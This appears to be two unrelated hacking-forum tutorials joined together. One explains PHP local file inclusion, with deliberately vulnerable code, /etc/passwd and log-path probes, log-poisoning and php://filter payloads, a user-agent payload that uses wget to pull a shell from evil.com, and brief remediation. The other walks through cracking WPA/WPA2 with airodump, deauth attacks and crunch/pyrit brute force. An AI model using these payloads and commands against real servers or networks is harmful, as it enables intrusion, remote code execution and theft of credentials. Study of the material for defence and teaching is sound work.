To now we have only been talking about this page as a page. Lets go into more details. Make a new file called index.php in your web server's root web folder(or any other place on your computer or server that you want it and your web server can reach it depending on your web server settings). On windows its going to look something like C:\apache\public_html\. On Linux it will be something like /var/www/public_html/. Additionally create a new folder in the same folder as index.php called "pages". Inside the folder "pages" create four new files called "index.php", "home.php", "page1.php" and "page2.php". File tree:

Quote

Your-Apache-Web-Folder
|-- pages
|   |-- index.php
|   |-- home.php
|   |-- page1.php
|   |-- page2.php
|
|-- index.php

Ps. (The index.php inside the pages folder is just so people cant list the files in the folder. Don't mind it, just let it be there, empty)

What we are going to do now is; Instead of just using the echo() function in the PHP script to echo static values for each of the pages. We are going to use the include() function. Its real simple. Put this in your index.php:

Code

<html>
     <head>
          <title>A Common Website Layout</title>
     </head>
     <body>

          <div align="center" class="logo-area"></div>

          <div align="center" class="navigation-area">
                    <a href="index.php?page=home">Home</a> |
                    <a href="index.php?page=page1">Page1</a> |
                    <a href="index.php?page=page2">Page2</a>
          </div>

          <div align="center" class="main-content-area">
<?php
// This is a PHP comment.
// PHP comments does not affect the PHP script
// Nor is PHP comments showed in the HTML code in the end. Actually, nothing of the stuff in between "<?php" and "<?" will be shown in the HTML source

// Lets first see if the GET argument we want to use is presentif (isset($_GET['page']))
{
     // The GET argument with name "page" is present. Lets look at its value:
     if ($_GET['page'] == "home")
     {
          // The GET argument's value is "home". Lets include the home.php page to the HTML source
          include("pages/home.php");
     }
     elseif ($_GET['page'] == "page1")
     {
          // The GET argument's value is "page1". Lets include the page1.php page to the HTML source
          include("pages/page1.php");
     }
     elseif ($_GET['page'] == "page2")
     {
          // The GET argument's value is "page2". Lets include the page2.php page to the HTML source
          include("pages/page2.php");
     }
     else
     {
          // The GET argument's value is none of what we want, lets just give him the home page
          include("pages/home.php");
     }
}
else
{
          // The GET argument is not present in the URL. That means he is at the home page. Lets give him the home page.
          include("pages/home.php");
}
?>
          </div>

          <div align="center" class="navigation-or-copyright-area">
                    Copyright [url=http://www.Evilzone.org]www.Evilzone.org[/url] 2011
          </div>

     </body>
</html>

See? All we did was replacing the echo with include. This will now read the contents and code of home.php, page1.php and page2.php and print that to the HTML instead, depending on the GET argument. Now we can have huge pages with long texts, images and more code inside each of the three files we used in the pages directory, without having a huge mess in the index.php. When/if you want to edit your pages you simply locate the page files in the page folder and edit that one file. Sweet right? Absolutely! However if you do not know what the fuck you are doing when you are using the include() function you can get some serious security issues.



1.1 Understanding LFI

In itself, the include() function is not vulnerable to anything. Its wrong/dangerous use of it that causes the security issues. The include() function is not limited to reading local files. It can even read remote files from URL's. So you could do include("http://site.com/pages/page.txt") and it would include the contents of page.txt. But mostly the include() function will be used to include dynamic pages: include("pages/home.php"). This is what creates LFI scenarios.

Lets create a new scenario. We got the following files/pages:
index.php
1.php
2.php
3.php

index.php is the file the users are going to visit with his browser. When the user first visits the index.php we are going to display 3 links.

Code

<a href="index.php?page=1">Page 1</a>
<a href="index.php?page=2">Page 2</a>
<a href="index.php?page=3">Page 3</a>

When the user clicks the first link its going to show the content of 1.php, when the user clicks the second link its going to show the contents of 2.php and when the user clicks the last link its going to show the contents of 3.php.

The index.php script site would in this case look something like this(note that I am now coding like an idiot to create security holes):

Code

if (isset($_GET['page']))
{
    // The GET argument is present. Lets include the page.
    include($_GET['page'] . ".php");
}
else
{
    // The GET argument is not present. Lets give the poor guy some links!
    echo('<p><a href="index.php?page=1">Page 1</a></p>');
    echo('<p><a href="index.php?page=2">Page 2</a></p>');
    echo('<p><a href="index.php?page=3">Page 3</a></p>');
}

The content of 1,2 and 3 is not important in this example so I wont say anything about that.

Now, when a user clicks the Page 1 link he or she is taken to www.example.com/index.php?page=1

The PHP script in index.php will now see that the user is requesting the page called 1 and it will include the number in the URL GET argument + ".php" the same goes for 2 and 3.

So, for Page 1 it will include 1.php, for Page 2 it will include 2.php and for Page 3 it will include 3.php

So far, so good. Right? Not really. The above script is a death trap. You might not see it, but I do. And I will show you.
What if I where to go to index.php?page=4? It would then try to include 4.php. But that file obviously does not exist. So the page would return an error message like this:

Quote

Warning: include(4.php) [function.include]: failed to open stream: No such file or directory in PATH on line 3

Warning: include() [function.include]: Failed opening '4.php' for inclusion (include_path='.;PATH') in PATH\\index.php on line 3

Its important to note that, not all web servers will show you error messages when there is errors. You can chose to not show users error messages on purpose so its harder to find vulnerable pages and they give out less information about whats happening in the code. Either way, lets see what more we can do with this.

Before we continue: Further now, I will be using linux/unix paths(/var/log/). And not c:\blabla\. In case of vulnerabilities on windows servers, the concept remains the same. Just change the path.

If I was to go to index.php?page=/etc/passwd what would happen?
Thats right, the PHP script would try to include whatever the file /etc/passwd contains. And if /etc/passwd was to contain more PHP code, it would also get executed. Meaning we can run any PHP command/function on the server. Which most defiantly is extremely dangerous. However, in this example (/etc/passwd) we wont have any PHP code. But it will contain all the users on the server. The /etc/passwd is typically the file you will try to include first in any LFI, simply becuase it will always be there on linux servers.

Do you see the part in the argument value? Yah, that is not a typo This is to get rid of the .php part of the include code. Everything after will be discarded.



1.2 Finding LFI vulnerabilities

This part is going to be rather short, as I almost explained everything in the previous part. Nonetheless.
Like said above. To check for the most basic vulnerabilities all you need to do is manipulate the GET arguments and look for error messages looking like the one above. However as said, its not always you will get an error message. Sometimes the script might even redirect you to the home page or something when it detects an error.

Here is a few examples of GET arguments manipulating:
Normal URL → Manipulated, hopefully error creating URL
www.site.com/index.php?id=1 → www.site.com/index.php?id=1awdasgfaeg
www.site.com/index.php?page=index → www.site.com/index.php?page=qqqqqqq
www.site.com/index.php?site=index → www.site.com/index.php?site=qqqqqq

Use your imagination... And for those who did not understand. The arguments does not need to be "id" or "page" or "site". It can be anything.

If you do not get an error, but just a blank page. Or you get redirected. You should try changing the GET argument(s) to /etc/passwd, /proc/self/environ and or other files you know are present. You should even try just changing it to index.php or the relative path to some image or css file on the page, just to see if you are able to include anything. If the server is set up to not display error messages and there is a vulnerability, your code/file will still be included even tho you didn't get any error messages indicating there is a vulnerability there.

Confused about the text above? Read here:
In the text above I talked about /etc/passwd and /proc/self/envorn. I talked about relative paths to images or and css files on the server. If you did not understand some of these concepts I will try to explain further here.
Why try to include /etc/passwd or /proc/self/envorn? Well. These are universal linux files. They will always be present at those paths. They are also usefull in some cases. You can include any file you want. But for the sake of finding vulns. The /etc/passwd, /etc/hosts, /etc/group or and /proc/self/environ are good files to try.
What do you mean about "changing it to index.php or the relative path to some image or css file on the page?"; Okay, so. If you change the possible LFI-vulnerable GET argument to index.php and you see a slightly messed up looking page. You might have been successful including index.php into index.php(assuming you are trying to exploit index.php. The filename really does not matter, its just a proof of concept). Which again means you might be able to include other interesting files. When it comes to the relative path of a image or css file, I mean: Lets say your possible-LFI vulnerable script is www.site.com/abc.php?do=BLABLA. On that site there is various images. You notice the images are located in www.site.com/images/. You should then try to change BLABLA to images/someimage.png to see if you can include that file. Likewise for css files or something similar, if the(a) css file is located at www.site.com/css/style.css you should try changing BLABLA to css/style.css and see if you get the contents of style.css printed out on the page. Again. The file name or file location does not matter. This is simply to make sure we are able to include files. If you are successful including one of the files above, don't bother trying the other ones. Just move along to the attack part.



1.3 Exploiting LFI vulnerabilities

Lets say that you have successfully found a vulnerable page.

The URL is www.site2.com/index.php?page=index

First I will discuss the normal method of LFI vulnerabiltities. Then I will move on to slightly more interesting methods of gaining some sort of access to the server. We get to remember, even tho we might have a LFI vulnerability. This does not directly mean we have hacked our target, nor does it guarantee a successful breach.

For the case of simplicity. We will say that all we need to do is edit the page=index to /etc/passwd and we will successfully include /etc/passwd. Nothing fancy. In a lot of cases it will be neccesery to do ../../../../../../../../../etc/passwd because the php script will try to include something in its root directory, then we need to go back lots of folders(../../../) until we reach / and then go to etc/ and read passwd. How many ../'s you use does not matter. Just use enough.

---

Normal method
www.site2.com/index.php?page=/etc/passwd gives us this output:

Quote

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh

Note that you will not get the same output(you might, but probably not). Don't worry. As long as you get something looking like this you are good.

So, we know this server for SURE is vulnerable to LFI. Lets discuss how we can get some access to this server. The file /etc/shadow is what contains the system's logins nowdays. But unless the web server is running as root(highest privilege user) you wont be able to read that file. But you should/could try it nonetheless.

Further more, its not really any easy way getting more access than LFI to a server with normal inclusion. You can try lurking around a bit and see if you find any interesting files, you might get lucky. But normally, from this point on you move on to log poisoning, /proc/self/environ or other methods of attacks.

---

Log poisoning
After knowing you can include any file(s) with a LFI. You could try log poisoning to execute PHP code to gain higher access to the system.

In order to perform a LFI log poisoning you need to be able to include the apache error or and access logs. Unfortuantly for us I believe this have been made "impossible" in newer versions of apache(the most used web server). Nonetheless. It does not stop us from trying.

First, try including various known locations for the apache logs. Here are a few common paths:

Quote

/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access. log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_l og
/usr/local/apache/logs/error.l og
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log

These are the most common ones, as said. But you might find yourself in a lot of situations where thins are not where they commonly are. If you find yourself failing on all of those common paths for the logs, just give up and move on to another method of attack. Most likely, you wont find the log path or you cant read it.

However, if you do manage to include the error and or access log, you will most likely crash your browser if you are exploiting a huge site. Or you will see tons and tons and tons of access or and error logs In this case, read further(even if your browser crashes).

Now, the whole point with including the error and or access log(s) are to be able to include something we can modify. Because, we can easily modify the access or error logs!

What we want to do is, "poison" the logs with PHP code. Then include them with the LFI and therefore executing the code! All you need to do is go to www.site2.com/<?php system("echo include($_GET['a']); > /tmp/mmmmmmm") ?> and you will poison the error log(cuz the file <?php system("echo include($_GET['a']); > /tmp/mmmmmmm") ?> will most likely not exist and therefore make a 404 error)

If done correctly, you will now execute the following code by including the error log:

Code

<?php
system("echo include($_GET['a']); > /tmp/mmmmmmm")?>

This will write a file called mmmmmmm to /tmp/ which you can now include instead of the log files(just to make things a bit more practical). I wont go into further details on how to compromise a system. I basically served you your systems head on a plate. You got a working LFI, you poisoned the log file(s) and you got a system() code execution at /tmp/mmmmmmm

---

The /proc/self/environ method
The /proc/self/environ method is a lot like log poisoning, just a lot simpler. And more commonly found(nowdays anyway).

The environ file is simply a file that will spit out information about the "environment". That is, information about the system, the user and process etc. Keep in mind that this isn't a file really, its a stream. Changing depending on the shell environment.

The environ file/stream will print out, among other things, the user-agent. This is what we will use to execute PHP code.

If you just include the /proc/self/environ without any tampering, you should see something like this:

Quote

DOCUMENT_ROOT=/somepath/somepath/somepath GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=something=something HTTP_HOST=www.site2.com HTTP_USER_AGENT=Some user agent PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=41823 REQUEST_METHOD=GET REQUEST_URI=/index.php?do=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/somepath/somepath/somepath/index.php SCRIPT_NAME=/index.php SERVER_ADDR=127.0.0.1 SERVER_ADMIN=webmaster@site2.com SERVER_NAME=www.site2.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i Server at www.site2.com Port 80

You can see that it will output a lot of info. Like the user-agent, which we will use to tamper the output with.

Now, use your favorite user-agent switcher or tampering program. I can recommend tamper data or any user-agent switcher for Firefox.

Change your user-agent to <?php system("wget http://evil.com/myshell.txt -o /var/path/to/www/folder/myshell.php"); ?>

And voila! The environ stream now outputs your user-agent-PHP-code back the the PHP script, which hopefully executes the code. If you did everything correctly, and everything worked as planned. You should now have a shell at /var/path/to/www/folder/myshell.php which hopefully is www.site2.com/myshell.php with the contents of http://evil.com/myshell.txt. Of course this is all proof of concept stuff. So you would have to change a lot of paths and so on. But this is how you do it anyway.

---

PHP filter method(s)
The PHP file method is the last method I will discuss in this tutorial for now. If you have other LFI techniques you are welcome to post them and I will include them in this tutorial, with your name all over it of course

The PHP filter method is basically just like normal LFI. Except, you can actually read the PHP source code of the files you include instead of executing the code! Which means, we can read configuration files and such for PHP scripts. Which sometimes can lead to some sort of access.

What we want to do is convert the data we get from reading the file to something that will not get executed when it goes thought the include() function. Base64 encryption will do this. With PHP filters you can convert the data you read from a file to base64 before it gets included. This way, we will get base64 output to our browser, which, when decrypted will be PHP source code if you include a PHP file.

This is how you do it:
www.site2.com/index.php?page=php://filter/read=convert.base64-encode/resource=YOUREFILE

So, if you want to read config.php you do:
www.site2.com/index.php?page=php://filter/read=convert.base64-encode/resource=config.php

config.php will most of the time contain some interesting information if it exists. Like MySQL logins and whatnot(depending on the script ofc). You will get something looking like this in your browser:

Quote

VGhpcyBpcyBhIGJhc2U2NCBzdHJpbmc=

You can decode it with this online tool: http://coderstoolbox.net/string/

More info on PHP filters: http://php.net/manual/en/wrappers.php.php
Other wrappers: http://www.php.net/manual/en/wrappers.php


 

---

Additionally I would like to mention the PHP session method. This one is a little more advance, but if you know how cookies, sessions and tampering of these two works you will get it. If you are able(not sites "allow" this) to edit your PHP session value with some cookie editor or tamer program. You edit your session data to PHP code and include it. The path to the session file on the server is most of the time: /tmp/sess_YOUR_SESSION_ID but it can be located in other places to, like /var/lib/php5/. But with the same name(sess_YOUR_SESSION_ID)


Now, if all of the above methods fail. Not all hope is lost yet. If you find a file upload somewhere on the site, let it be images, rar files, zip files, avatars, text files, pdf's. Almost anything. You can tamper the files, add some PHP code to the end of it or something. And try to include it. That is, if you know the file path after you upload it ofc.


Further details on how to root, steal, deface(lame) and whatnot will not be included in this tutorial. This tutorial is for security purposes only, and for creativity.



1.4 Securing  LFI vulnerabilities

Okay, this is the part where I don't know if I am supposed to laugh or cry. The only reason(okay, I know its easy to screw up.. But seriously..) I can think of why you would create a security issue like LFI is if you have absolutely no idea what you are doing. You are an idiot if you screw up that bad.

Honestly, just. Don't EVER have user inputs in your include() calls. Do a if/elseif/else or switch/case statement instead. Like this:

Using if/elseif/else statement(s):

Code

<?phpif (isset($_GET['page']))
{
     if ($_GET['page']=="home")
     {
          include("home.php");
     }
     elseif ($_GET['page']=="page1")
     {
          include("page1.php");
     }
     else
     {
          include("home.php");
     }
}
else
{include("home.php");}?>

Using switch/case(slightly more efficient than if statements in terms of lines of code):

Code

<?phpif (isset($_GET['page']))
{
     switch($_GET['page'])
     {
          case "home":
               include("home.php");
          
          case "page1":
               include("page1.php");

          default:
               include("home.php");
     }
}
else
{include("home.php");}?>

Don't EVER do like this:

Code

<?phpif (isset($_GET['page']))
{
      include($_GET['page'].".php");
}
else
{include("home.php");}?>

EVER



Add from I_Learning_I (May 30, 2011) (RFI tutorial)

Quote

There is yet another way to prevent RFI(and LFI kinda), which is basically trimming the string to some special characters, like http:, //, /, you get the drill.
Here's an example:

Code

function check_url($page){

$page = str_replace("http://", "", $page);
$page = str_replace("/", "", $page);
$page = str_replace("\\", "", $page);
$page = str_replace("../", "", $page);
$page = str_replace(".", "", $page);
$page = str_replace("php", "", $page);


return $page;
}

echo "<title>Index</title>";
if($_GET){
   $id=check_url($_GET['id'])."php";
      if(file_exists($id)){
         require($id);
      }else{
                        require("index.php");
               }
}

My response tho: This code can still be tampered with to include local files(LFI). So, I would still go for a if/case statement. But its not impossible to do a direct include on the user-input and it still being secure. Its just a lot more to think of than if you just do a if/case statement.

Bye!

Manual WPA/WPA2 Hacking & Cracking

(This is by no means meant to be followed and actually used unless you have the time and resources.
Please use this as an informative post. This method is obsolete as there are tools mentioned at the bottom of the post to automate this process.
I am in no way responsible if you decide to follow this step by step and wind up failing your hdd. 
Aircrack can be hit & miss with correctly identifying a WPA Handshake).
 
 
 
Tools used:
aircrack suite
crunch
pyrit
wireless card capable of packet injection
 
 
To begin the process of hacking a targeted wireless network, set the wireless card into monitor mode by using the following command in terminal. (The entire process will be done within terminal as root)
 

airmon-ng start wlan0

 
This will create an interface named mon0. This name of the interface will sometimes vary from user to user.
 
If there are processes that cause the wireless card to not be set into monitor mode, run the following in terminal.
 

airmon-ng check kill
airmon-ng start wlan0

 
Next airodump will be used to scan for networks within range.
 

airodump-ng mon0

 
Wait for airodump to display the targeted network. Once the network is shown, stop airodump and copy down the BSSID. If you are documenting the process, now is also a good time to take note of what channel the network is on as well as any STATION associated with the BSSID.
 
Now begin capturing files on the target network and write them to a file. 
This can be done using the following command.
 

airodump-ng -c # --bssid XX:XX:XX:XX:XX:XX -w FILENAME mon0

Replace # with the network channel, XX:XX:XX:XX:XX:XX with the MAC of the network, and FILENAME with whatever you'd like.
 
airodump should only capturing files on the targeted network and fixed to the specified channel.
Example

CH  1 ][ Elapsed: 19 s ][ 2016-03-26 03:11 ]

 BSSID              PWR   Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

XX:XX:XX:XX:XX:XX    -85       WPA2 CCMP   PSK  VICTIM

 BSSID    STATION       PWR   Rate  Lost Frames Probe

XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX   -34   36e-36e      3       170

If you are having trouble fixing your interface to the specified channel, you may need to run the following code.
 

airodump-ng -c # --bssid XX:XX:XX:XX:XX:XX -w FILENAME --ignore-negative-one mon0

 
Now capture a WPA handshake so that it can be cracked. 
This can be done by waiting for a user to connect to the network or using a deauth attack via aireplay.
Since this is a tutorial, run a deauth attack against a specified STATION on the network.
 
To do this, run the following code in a separate terminal

aireplay-ng --deauth 0 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX mon0

replace -a XX:XX:XX:XX:XX:XX with the BSSID and -c XX:XX:XX:XX:XX:XX with the STATION associated with the BSSID. --deauth 0 means that it will run very quickly at an interval of a whopping 0 seconds. Run this for a few seconds and then stop it via ctrl+c.
 
If lucky, airodump should now say [ WPA XX:XX:XX:XX:XX:XX ]
where XX:XX:XX:XX:XX:XX is equal to the BSSID.
 
example from the top of airodump

CH  1 ][ Elapsed: 54 s ][ 2016-03-26 03:12 ][ WPA XX:XX:XX:XX:XX:XX ]

 BSSID              PWR   Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

XX:XX:XX:XX:XX:XX    -85       WPA2 CCMP   PSK  VICTIM

 BSSID    STATION       PWR   Rate  Lost Frames Probe

XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX   -34   36e-36e   187       2435

 
Now, if successful in capturing the handshake, stop airodump and begin cracking the file.
 
To be sure the handshake was captured, run the following in terminal.

aircrack-ng FILENAME-01.cap

replace FILENAME with whatever you chose to name your file while running airodump.
If you are unsure, look in your home directory for the .cap file.
 
The output should be something similar to this

root@kali:~# aircrack-ng FILENAME-01.cap
Opening FILENAME-01.cap
Read XXXX packets.
   #  BSSID              ESSID                     Encryption
   1  XX:XX:XX:XX:XX:XX  VICTIM                    WPA (1 handshake)

 
Next use crunch to generate a word-list and pyrit to crack the file by using GPU power with the following command.
!!WARNING!! Crunch can take up an enormous amount of space and may cause your hdd to fail. Adjust the code to your needs !!WARNING!!

crunch 8 14 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | pyrit -r FILENAME-01.cap -b XX:XX:XX:XX:XX:XX -i - attack_passthrough

8 is used because of the minimum for WPA/WPA2 password length
14 can be changed to a higher or lower value. 
FILENAME-01.cap if your specified file 
-b XX:XX:XX:XX:XX:XX is the bssid
If you know the length of the pass word then you can enter X X
for example, if i knew the password was only 8 characters or numbers, I would use 8 8.
 
You can also shorten the amount of time spent cracking if you already know the password.
For example, if i were cracking the password a1b2c3d4 the following code could be used instead.

crunch 8 8 abcd1234 | pyrit -r FILENAME-01.cap -b XX:XX:XX:XX:XX:XX -i - attack_passthrough

 
 
That concludes Manually hacking & Cracking a WPA/WPA2 secured wireless network.
This entire process can be automated with tools such as Reaver, wifite, & hashcat. (I will write tutorials as requested).
Online services are also available for cracking the handshake.
If you have any questions or comments regarding this process, please comment below.
 
I do not take any responsibility with what you decide to do with the information provided within this post.
Make sure you have authorization if using the methods described on a network other than your own.

Bye!